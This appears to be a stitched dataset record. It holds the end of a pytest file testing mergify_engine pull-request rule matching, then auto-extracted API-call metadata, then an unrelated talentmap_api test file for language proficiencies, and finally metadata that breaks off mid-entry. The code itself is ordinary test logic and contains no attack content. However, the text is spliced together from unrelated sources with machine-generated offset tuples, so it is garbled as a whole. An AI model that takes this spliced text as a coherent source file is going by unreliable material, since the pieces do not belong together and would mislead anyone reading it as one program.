            "user": {"login": "sileht", "type": "User"},
            "state": "APPROVED",
            "author_association": "MEMBER",
        }
    ]
    get_files = [{"filename": "README.rst"}, {"filename": "setup.py"}]
    get_team_members = [{"login": "sileht"}, {"login": "jd"}]
    get_checks = []
    get_statuses = [{"context": "continuous-integration/fake-ci", "state": "success"}]

    client.item.return_value = {"permission": "write"}  # get review user perm

    def client_items(url, *args, **kwargs):
        if url == "pulls/1/reviews":
            return get_reviews
        elif url == "pulls/1/files":
            return get_files
        elif url == "commits/<sha>/check-runs":
            return get_checks
        elif url == "commits/<sha>/status":
            return get_statuses
        elif url == "/orgs/orgs/teams/my-reviewers/members":
            return get_team_members
        else:
            raise RuntimeError(f"not handled url {url}")

    client.items.side_effect = client_items

    ctxt = context.Context(
        client,
        {
            "number": 1,
            "html_url": "<html_url>",
            "state": "closed",
            "merged_by": None,
            "merged_at": None,
            "merged": False,
            "draft": False,
            "milestone": None,
            "mergeable_state": "unstable",
            "assignees": [],
            "labels": [],
            "author": "jd",
            "base": {
                "ref": "master",
                "repo": {"name": "name", "private": False},
            },
            "head": {"ref": "myfeature", "sha": "<sha>"},
            "locked": False,
            "requested_reviewers": [],
            "requested_teams": [],
            "title": "My awesome job",
            "body": "I rock",
            "user": {"login": "another-jd"},
        },
        {},
    )

    # Empty conditions
    pull_request_rules = rules.PullRequestRules(
        [{"name": "default", "conditions": [], "actions": {}}]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["default"]
    assert [r["name"] for r, _ in match.matching_rules] == ["default"]
    assert [(r, []) for r in match.rules] == match.matching_rules
    for rule in match.rules:
        assert rule["actions"] == {}

    pull_request_rules = rules.PullRequestRules.from_list(
        [{"name": "hello", "conditions": ["base:master"], "actions": {}}]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["hello"]
    assert [r["name"] for r, _ in match.matching_rules] == ["hello"]
    assert [(r, []) for r in match.rules] == match.matching_rules
    for rule in match.rules:
        assert rule["actions"] == {}

    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {"name": "hello", "conditions": ["base:master"], "actions": {}},
            {"name": "backport", "conditions": ["base:master"], "actions": {}},
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["hello", "backport"]
    assert [r["name"] for r, _ in match.matching_rules] == ["hello", "backport"]
    assert [(r, []) for r in match.rules] == match.matching_rules
    for rule in match.rules:
        assert rule["actions"] == {}

    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {"name": "hello", "conditions": ["#files=3"], "actions": {}},
            {"name": "backport", "conditions": ["base:master"], "actions": {}},
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["hello", "backport"]
    assert [r["name"] for r, _ in match.matching_rules] == ["backport"]
    for rule in match.rules:
        assert rule["actions"] == {}

    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {"name": "hello", "conditions": ["#files=2"], "actions": {}},
            {"name": "backport", "conditions": ["base:master"], "actions": {}},
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["hello", "backport"]
    assert [r["name"] for r, _ in match.matching_rules] == ["hello", "backport"]
    assert [(r, []) for r in match.rules] == match.matching_rules
    for rule in match.rules:
        assert rule["actions"] == {}

    # No match
    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {
                "name": "merge",
                "conditions": [
                    "base=xyz",
                    "status-success=continuous-integration/fake-ci",
                    "#approved-reviews-by>=1",
                ],
                "actions": {},
            }
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["merge"]
    assert [r["name"] for r, _ in match.matching_rules] == []

    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {
                "name": "merge",
                "conditions": [
                    "base=master",
                    "status-success=continuous-integration/fake-ci",
                    "#approved-reviews-by>=1",
                ],
                "actions": {},
            }
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["merge"]
    assert [r["name"] for r, _ in match.matching_rules] == ["merge"]
    assert [(r, []) for r in match.rules] == match.matching_rules
    for rule in match.rules:
        assert rule["actions"] == {}

    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {
                "name": "merge",
                "conditions": [
                    "base=master",
                    "status-success=continuous-integration/fake-ci",
                    "#approved-reviews-by>=2",
                ],
                "actions": {},
            },
            {
                "name": "fast merge",
                "conditions": [
                    "base=master",
                    "label=fast-track",
                    "status-success=continuous-integration/fake-ci",
                    "#approved-reviews-by>=1",
                ],
                "actions": {},
            },
            {
                "name": "fast merge with alternate ci",
                "conditions": [
                    "base=master",
                    "label=fast-track",
                    "status-success=continuous-integration/fake-ci-bis",
                    "#approved-reviews-by>=1",
                ],
                "actions": {},
            },
            {
                "name": "fast merge from a bot",
                "conditions": [
                    "base=master",
                    "author=mybot",
                    "status-success=continuous-integration/fake-ci",
                ],
                "actions": {},
            },
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == [
        "merge",
        "fast merge",
        "fast merge with alternate ci",
        "fast merge from a bot",
    ]
    assert [r["name"] for r, _ in match.matching_rules] == [
        "merge",
        "fast merge",
        "fast merge with alternate ci",
    ]
    for rule in match.rules:
        assert rule["actions"] == {}

    assert match.matching_rules[0][0]["name"] == "merge"
    assert len(match.matching_rules[0][1]) == 1
    assert str(match.matching_rules[0][1][0]) == "#approved-reviews-by>=2"

    assert match.matching_rules[1][0]["name"] == "fast merge"
    assert len(match.matching_rules[1][1]) == 1
    assert str(match.matching_rules[1][1][0]) == "label=fast-track"

    assert match.matching_rules[2][0]["name"] == "fast merge with alternate ci"
    assert len(match.matching_rules[2][1]) == 2
    assert str(match.matching_rules[2][1][0]) == "label=fast-track"
    assert (
        str(match.matching_rules[2][1][1])
        == "status-success=continuous-integration/fake-ci-bis"
    )

    # Team conditions with one review missing
    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {
                "name": "default",
                "conditions": [
                    "approved-reviews-by=@orgs/my-reviewers",
                    "#approved-reviews-by>=2",
                ],
                "actions": {},
            }
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["default"]
    assert [r["name"] for r, _ in match.matching_rules] == ["default"]

    assert match.matching_rules[0][0]["name"] == "default"
    assert len(match.matching_rules[0][1]) == 1
    assert str(match.matching_rules[0][1][0]) == "#approved-reviews-by>=2"

    get_reviews.append(
        {
            "user": {"login": "jd", "type": "User"},
            "state": "APPROVED",
            "author_association": "MEMBER",
        }
    )

    del ctxt.__dict__["reviews"]
    del ctxt.__dict__["consolidated_reviews"]

    # Team conditions with no review missing
    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {
                "name": "default",
                "conditions": [
                    "approved-reviews-by=@orgs/my-reviewers",
                    "#approved-reviews-by>=2",
                ],
                "actions": {},
            }
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["default"]
    assert [r["name"] for r, _ in match.matching_rules] == ["default"]

    assert match.matching_rules[0][0]["name"] == "default"
    assert len(match.matching_rules[0][1]) == 0

    # Forbidden labels, when no label set
    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {
                "name": "default",
                "conditions": ["-label~=^(status/wip|status/blocked|review/need2)$"],
                "actions": {},
            }
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["default"]
    assert [r["name"] for r, _ in match.matching_rules] == ["default"]

    assert match.matching_rules[0][0]["name"] == "default"
    assert len(match.matching_rules[0][1]) == 0

    # Forbidden labels, when forbidden label set
    ctxt.pull["labels"] = [{"name": "status/wip"}]

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["default"]
    assert [r["name"] for r, _ in match.matching_rules] == ["default"]

    assert match.matching_rules[0][0]["name"] == "default"
    assert len(match.matching_rules[0][1]) == 1
    assert str(match.matching_rules[0][1][0]) == (
        "-label~=^(status/wip|status/blocked|review/need2)$"
    )

    # Forbidden labels, when other label set
    ctxt.pull["labels"] = [{"name": "allowed"}]

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["default"]
    assert [r["name"] for r, _ in match.matching_rules] == ["default"]

    assert match.matching_rules[0][0]["name"] == "default"
    assert len(match.matching_rules[0][1]) == 0

    # Test team expander
    pull_request_rules = rules.PullRequestRules.from_list(
        [
            {
                "name": "default",
                "conditions": ["author~=^(user1|user2|another-jd)$"],
                "actions": {},
            }
        ]
    )

    match = pull_request_rules.get_pull_request_rule(ctxt)
    assert [r["name"] for r in match.rules] == ["default"]
    assert [r["name"] for r, _ in match.matching_rules] == ["default"]
    assert match.matching_rules[0][0]["name"] == "default"
    assert len(match.matching_rules[0][1]) == 0
|
[
"mergify_engine.rules.PullRequestRuleCondition",
"mergify_engine.rules.PullRequestRules.from_list",
"mergify_engine.context.Context",
"unittest.mock.Mock",
"pytest.raises",
"mergify_engine.rules.UserConfigurationSchema",
"pytest.mark.parametrize",
"mergify_engine.rules.InvalidRules",
"mergify_engine.rules.PullRequestRules"
] |
[((989, 1172), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""valid"""', "({'name': 'hello', 'conditions': ['head:master'], 'actions': {}}, {'name':\n 'hello', 'conditions': ['base:foo', 'base:baz'], 'actions': {}})"], {}), "('valid', ({'name': 'hello', 'conditions': [\n 'head:master'], 'actions': {}}, {'name': 'hello', 'conditions': [\n 'base:foo', 'base:baz'], 'actions': {}}))\n", (1012, 1172), False, 'import pytest\n'), ((4461, 6289), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""invalid,match"""', '(({\'name\': \'hello\', \'conditions\': [\'this is wrong\'], \'actions\': {}},\n \'Invalid condition \'), ({\'name\': \'invalid regexp\', \'conditions\': [\n \'head~=(lol\'], \'actions\': {}},\n "Invalid condition \'head~=\\\\(lol\'. Invalid arguments: missing \\\\), unterminated subpattern at position 0 @ "\n ), ({\'name\': \'hello\', \'conditions\': [\'head|4\'], \'actions\': {}},\n \'Invalid condition \'), ({\'name\': \'hello\', \'conditions\': [{\'foo\': \'bar\'}\n ], \'actions\': {}},\n "expected str @ data\\\\[0\\\\]\\\\[\'conditions\'\\\\]\\\\[0\\\\]"), ({\'name\':\n \'hello\', \'conditions\': [], \'actions\': {}, \'foobar\': True},\n \'extra keys not allowed\'), ({\'name\': \'hello\', \'conditions\': [],\n \'actions\': {\'merge\': True}},\n "expected a dictionary for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'merge\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'backport\': {\n \'regexes\': [\'(azerty\']}}},\n "missing \\\\), unterminated subpattern at position 0 @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'backport\'\\\\]\\\\[\'regexes\'\\\\]\\\\[0\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'backport\': True}},\n "expected a dictionary for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'backport\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'merge\': {\'strict\':\n \'yes\'}}},\n "expected bool for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'merge\'\\\\]\\\\[\'strict\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'review\': {\n \'message\': \'{{syntax error\'}}},\n "Template syntax error @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'review\'\\\\]\\\\[\'message\'\\\\]\\\\[line 1\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'review\': {\n \'message\': \'{{unknownattribute}}\'}}},\n "Template syntax error for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'review\'\\\\]\\\\[\'message\'\\\\]"\n ))'], {}), '(\'invalid,match\', (({\'name\': \'hello\', \'conditions\':\n [\'this is wrong\'], \'actions\': {}}, \'Invalid condition \'), ({\'name\':\n \'invalid regexp\', \'conditions\': [\'head~=(lol\'], \'actions\': {}},\n "Invalid condition \'head~=\\\\(lol\'. 
Invalid arguments: missing \\\\), unterminated subpattern at position 0 @ "\n ), ({\'name\': \'hello\', \'conditions\': [\'head|4\'], \'actions\': {}},\n \'Invalid condition \'), ({\'name\': \'hello\', \'conditions\': [{\'foo\': \'bar\'}\n ], \'actions\': {}},\n "expected str @ data\\\\[0\\\\]\\\\[\'conditions\'\\\\]\\\\[0\\\\]"), ({\'name\':\n \'hello\', \'conditions\': [], \'actions\': {}, \'foobar\': True},\n \'extra keys not allowed\'), ({\'name\': \'hello\', \'conditions\': [],\n \'actions\': {\'merge\': True}},\n "expected a dictionary for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'merge\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'backport\': {\n \'regexes\': [\'(azerty\']}}},\n "missing \\\\), unterminated subpattern at position 0 @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'backport\'\\\\]\\\\[\'regexes\'\\\\]\\\\[0\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'backport\': True}},\n "expected a dictionary for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'backport\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'merge\': {\'strict\':\n \'yes\'}}},\n "expected bool for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'merge\'\\\\]\\\\[\'strict\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'review\': {\n \'message\': \'{{syntax error\'}}},\n "Template syntax error @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'review\'\\\\]\\\\[\'message\'\\\\]\\\\[line 1\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'review\': {\n \'message\': \'{{unknownattribute}}\'}}},\n "Template syntax error for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'review\'\\\\]\\\\[\'message\'\\\\]"\n )))\n', (4484, 6289), False, 'import pytest\n'), ((777, 820), 'mergify_engine.rules.PullRequestRuleCondition', 'rules.PullRequestRuleCondition', (['"""head~=bar"""'], {}), "('head~=bar')\n", (807, 820), False, 'from mergify_engine import rules\n'), ((1236, 1277), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (['[valid]'], {}), '([valid])\n', (1268, 1277), False, 'from mergify_engine import rules\n'), ((1328, 1528), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': [], 'actions': {}}, {'name': 'foobar',\n 'conditions': [], 'actions': {}}, {'name': 'hello', 'conditions': [],\n 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [],\n 'actions': {}}, {'name': 'foobar', 'conditions': [], 'actions': {}}, {\n 'name': 'hello', 'conditions': [], 'actions': {}}])\n", (1360, 1528), False, 'from mergify_engine import rules\n'), ((2773, 2816), 'mergify_engine.rules.InvalidRules', 'rules.InvalidRules', (['i.value', '""".mergify.yml"""'], {}), "(i.value, '.mergify.yml')\n", (2791, 2816), False, 'from mergify_engine import rules\n'), ((3351, 3394), 'mergify_engine.rules.InvalidRules', 'rules.InvalidRules', (['i.value', '""".mergify.yml"""'], {}), "(i.value, '.mergify.yml')\n", (3369, 3394), False, 'from mergify_engine import rules\n'), ((7191, 7202), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (7200, 7202), False, 'from unittest import mock\n'), ((8262, 8808), 'mergify_engine.context.Context', 'context.Context', (['client', "{'number': 1, 'html_url': '<html_url>', 'state': 'closed', 'merged_by':\n None, 'merged_at': None, 'merged': False, 'draft': False, 'milestone':\n None, 'mergeable_state': 'unstable', 'assignees': [], 
'labels': [],\n 'author': 'jd', 'base': {'ref': 'master', 'repo': {'name': 'name',\n 'private': False}}, 'head': {'ref': 'myfeature', 'sha': '<sha>'},\n 'locked': False, 'requested_reviewers': [], 'requested_teams': [],\n 'title': 'My awesome job', 'body': 'I rock', 'user': {'login':\n 'another-jd'}}", '{}'], {}), "(client, {'number': 1, 'html_url': '<html_url>', 'state':\n 'closed', 'merged_by': None, 'merged_at': None, 'merged': False,\n 'draft': False, 'milestone': None, 'mergeable_state': 'unstable',\n 'assignees': [], 'labels': [], 'author': 'jd', 'base': {'ref': 'master',\n 'repo': {'name': 'name', 'private': False}}, 'head': {'ref':\n 'myfeature', 'sha': '<sha>'}, 'locked': False, 'requested_reviewers': [\n ], 'requested_teams': [], 'title': 'My awesome job', 'body': 'I rock',\n 'user': {'login': 'another-jd'}}, {})\n", (8277, 8808), False, 'from mergify_engine import context\n'), ((9158, 9236), 'mergify_engine.rules.PullRequestRules', 'rules.PullRequestRules', (["[{'name': 'default', 'conditions': [], 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [], 'actions': {}}])\n", (9180, 9236), False, 'from mergify_engine import rules\n'), ((9599, 9703), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': ['base:master'], 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [\n 'base:master'], 'actions': {}}])\n", (9631, 9703), False, 'from mergify_engine import rules\n'), ((10057, 10234), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': ['base:master'], 'actions': {}}, {'name':\n 'backport', 'conditions': ['base:master'], 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [\n 'base:master'], 'actions': {}}, {'name': 'backport', 'conditions': [\n 'base:master'], 'actions': {}}])\n", (10089, 10234), False, 'from mergify_engine import rules\n'), ((10642, 10816), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': ['#files=3'], 'actions': {}}, {'name':\n 'backport', 'conditions': ['base:master'], 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [\n '#files=3'], 'actions': {}}, {'name': 'backport', 'conditions': [\n 'base:master'], 'actions': {}}])\n", (10674, 10816), False, 'from mergify_engine import rules\n'), ((11149, 11323), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': ['#files=2'], 'actions': {}}, {'name':\n 'backport', 'conditions': ['base:master'], 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [\n '#files=2'], 'actions': {}}, {'name': 'backport', 'conditions': [\n 'base:master'], 'actions': {}}])\n", (11181, 11323), False, 'from mergify_engine import rules\n'), ((11746, 11927), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'merge', 'conditions': ['base=xyz',\n 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}]"], {}), "([{'name': 'merge', 'conditions': [\n 'base=xyz', 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}])\n", (11778, 11927), False, 'from mergify_engine import rules\n'), ((12302, 12486), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'merge', 'conditions': ['base=master',\n 'status-success=continuous-integration/fake-ci',\n 
'#approved-reviews-by>=1'], 'actions': {}}]"], {}), "([{'name': 'merge', 'conditions': [\n 'base=master', 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}])\n", (12334, 12486), False, 'from mergify_engine import rules\n'), ((13000, 13716), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'merge', 'conditions': ['base=master',\n 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=2'], 'actions': {}}, {'name': 'fast merge',\n 'conditions': ['base=master', 'label=fast-track',\n 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}, {'name':\n 'fast merge with alternate ci', 'conditions': ['base=master',\n 'label=fast-track', 'status-success=continuous-integration/fake-ci-bis',\n '#approved-reviews-by>=1'], 'actions': {}}, {'name':\n 'fast merge from a bot', 'conditions': ['base=master', 'author=mybot',\n 'status-success=continuous-integration/fake-ci'], 'actions': {}}]"], {}), "([{'name': 'merge', 'conditions': [\n 'base=master', 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=2'], 'actions': {}}, {'name': 'fast merge',\n 'conditions': ['base=master', 'label=fast-track',\n 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}, {'name':\n 'fast merge with alternate ci', 'conditions': ['base=master',\n 'label=fast-track', 'status-success=continuous-integration/fake-ci-bis',\n '#approved-reviews-by>=1'], 'actions': {}}, {'name':\n 'fast merge from a bot', 'conditions': ['base=master', 'author=mybot',\n 'status-success=continuous-integration/fake-ci'], 'actions': {}}])\n", (13032, 13716), False, 'from mergify_engine import rules\n'), ((15550, 15714), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'default', 'conditions': [\n 'approved-reviews-by=@orgs/my-reviewers', '#approved-reviews-by>=2'],\n 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [\n 'approved-reviews-by=@orgs/my-reviewers', '#approved-reviews-by>=2'],\n 'actions': {}}])\n", (15582, 15714), False, 'from mergify_engine import rules\n'), ((16569, 16733), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'default', 'conditions': [\n 'approved-reviews-by=@orgs/my-reviewers', '#approved-reviews-by>=2'],\n 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [\n 'approved-reviews-by=@orgs/my-reviewers', '#approved-reviews-by>=2'],\n 'actions': {}}])\n", (16601, 16733), False, 'from mergify_engine import rules\n'), ((17249, 17394), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'default', 'conditions': [\n '-label~=^(status/wip|status/blocked|review/need2)$'], 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [\n '-label~=^(status/wip|status/blocked|review/need2)$'], 'actions': {}}])\n", (17281, 17394), False, 'from mergify_engine import rules\n'), ((18743, 18872), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'default', 'conditions': ['author~=^(user1|user2|another-jd)$'],\n 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [\n 'author~=^(user1|user2|another-jd)$'], 'actions': {}}])\n", (18775, 18872), False, 'from mergify_engine import rules\n'), ((898, 931), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (911, 931), False, 
'import pytest\n'), ((941, 985), 'mergify_engine.rules.PullRequestRuleCondition', 'rules.PullRequestRuleCondition', (['"""head~=(bar"""'], {}), "('head~=(bar')\n", (971, 985), False, 'from mergify_engine import rules\n'), ((1772, 2134), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""\npull_request_rules:\n - name: ahah\n conditions:\n - base=master\n actions:\n comment:\n message: |\n This pull request has been approved by:\n {% for name in approved_reviews_by %}\n @{{name}}\n {% endfor %}\n Thank you @{{author}} for your contributions!\n\n"""'], {}), '(\n """\npull_request_rules:\n - name: ahah\n conditions:\n - base=master\n actions:\n comment:\n message: |\n This pull request has been approved by:\n {% for name in approved_reviews_by %}\n @{{name}}\n {% endfor %}\n Thank you @{{author}} for your contributions!\n\n"""\n )\n', (1801, 2134), False, 'from mergify_engine import rules\n'), ((2294, 2327), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (2307, 2327), False, 'import pytest\n'), ((2349, 2393), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""- no\n* way"""'], {}), "('- no\\n* way')\n", (2378, 2393), False, 'from mergify_engine import rules\n'), ((2475, 2508), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (2488, 2508), False, 'import pytest\n'), ((2523, 2643), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""\npull_request_rules:\n - name: ahah\n key: not really what we expected\n"""'], {}), '(\n """\npull_request_rules:\n - name: ahah\n key: not really what we expected\n"""\n )\n', (2552, 2643), False, 'from mergify_engine import rules\n'), ((3152, 3185), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (3165, 3185), False, 'import pytest\n'), ((3200, 3254), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""invalid:\n- *yaml\n"""'], {}), '("""invalid:\n- *yaml\n""")\n', (3229, 3254), False, 'from mergify_engine import rules\n'), ((4067, 4100), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (4080, 4100), False, 'import pytest\n'), ((4115, 4173), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['"""\npull_request_rules:\n"""'], {}), '("""\npull_request_rules:\n""")\n', (4144, 4173), False, 'from mergify_engine import rules\n'), ((4325, 4358), 'pytest.raises', 'pytest.raises', (['voluptuous.Invalid'], {}), '(voluptuous.Invalid)\n', (4338, 4358), False, 'import pytest\n'), ((4373, 4406), 'mergify_engine.rules.UserConfigurationSchema', 'rules.UserConfigurationSchema', (['""""""'], {}), "('')\n", (4402, 4406), False, 'from mergify_engine import rules\n'), ((7033, 7087), 'pytest.raises', 'pytest.raises', (['voluptuous.MultipleInvalid'], {'match': 'match'}), '(voluptuous.MultipleInvalid, match=match)\n', (7046, 7087), False, 'import pytest\n'), ((7097, 7140), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (['[invalid]'], {}), '([invalid])\n', (7129, 7140), False, 'from mergify_engine import rules\n')]
|
import pytest
from model_mommy import mommy
from talentmap_api.language.models import Qualification
@pytest.fixture
def test_language_model_fixture():
    # Create a specific language and a set of proficiencies for the tests
mommy.make('language.Language', code="DE", long_description="German", short_description="Ger")
mommy.make('language.Proficiency', code="3+")
mommy.make('language.Proficiency', code="3")
@pytest.mark.django_db()
def test_proficiency_comparisons():
p1 = mommy.make('language.Proficiency', id=1, code='3+')
p2 = p1
p3 = mommy.make('language.Proficiency', id=2, code='X')
p4 = mommy.make('language.Proficiency', id=3, code='2')
assert p1 >= p2
assert p1 <= p2
assert p1 > p3
assert p1 > p4
assert p4 <= p2
assert p4 > p3
assert p3 < p4
@pytest.mark.django_db()
@pytest.mark.usefixtures("test_language_model_fixture")
def test_qualification_get_or_create_by_codes():
qual, created = Qualification.get_or_create_by_codes("DE", "3+", "3")
assert created
assert qual.language.code == "DE"
assert qual.reading_proficiency.code == "3+"
assert qual.spoken_proficiency.code == "3"
qual, created = Qualification.get_or_create_by_codes("DE", "3+", "3")
assert not created
assert qual.language.code == "DE"
assert qual.reading_proficiency.code == "3+"
assert qual.spoken_proficiency.code == "3"
|
[
"model_mommy.mommy.make",
"pytest.mark.usefixtures",
"talentmap_api.language.models.Qualification.get_or_create_by_codes",
"pytest.mark.django_db"
] |
[((432, 455), 'pytest.mark.django_db', 'pytest.mark.django_db', ([], {}), '()\n', (453, 455), False, 'import pytest\n'), ((825, 848), 'pytest.mark.django_db', 'pytest.mark.django_db', ([], {}), '()\n', (846, 848), False, 'import pytest\n'), ((850, 904), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""test_language_model_fixture"""'], {}), "('test_language_model_fixture')\n", (873, 904), False, 'import pytest\n'), ((235, 333), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Language"""'], {'code': '"""DE"""', 'long_description': '"""German"""', 'short_description': '"""Ger"""'}), "('language.Language', code='DE', long_description='German',\n short_description='Ger')\n", (245, 333), False, 'from model_mommy import mommy\n'), ((334, 379), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'code': '"""3+"""'}), "('language.Proficiency', code='3+')\n", (344, 379), False, 'from model_mommy import mommy\n'), ((384, 428), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'code': '"""3"""'}), "('language.Proficiency', code='3')\n", (394, 428), False, 'from model_mommy import mommy\n'), ((501, 552), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'id': '(1)', 'code': '"""3+"""'}), "('language.Proficiency', id=1, code='3+')\n", (511, 552), False, 'from model_mommy import mommy\n'), ((574, 624), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'id': '(2)', 'code': '"""X"""'}), "('language.Proficiency', id=2, code='X')\n", (584, 624), False, 'from model_mommy import mommy\n'), ((634, 684), 'model_mommy.mommy.make', 'mommy.make', (['"""language.Proficiency"""'], {'id': '(3)', 'code': '"""2"""'}), "('language.Proficiency', id=3, code='2')\n", (644, 684), False, 'from model_mommy import mommy\n'), ((974, 1027), 'talentmap_api.language.models.Qualification.get_or_create_by_codes', 'Qualification.get_or_create_by_codes', (['"""DE"""', '"""3+"""', '"""3"""'], {}), "('DE', '3+', '3')\n", (1010, 1027), False, 'from talentmap_api.language.models import Qualification\n'), ((1203, 1256), 'talentmap_api.language.models.Qualification.get_or_create_by_codes', 'Qualification.get_or_create_by_codes', (['"""DE"""', '"""3+"""', '"""3"""'], {}), "('DE', '3+', '3')\n", (1239, 1256), 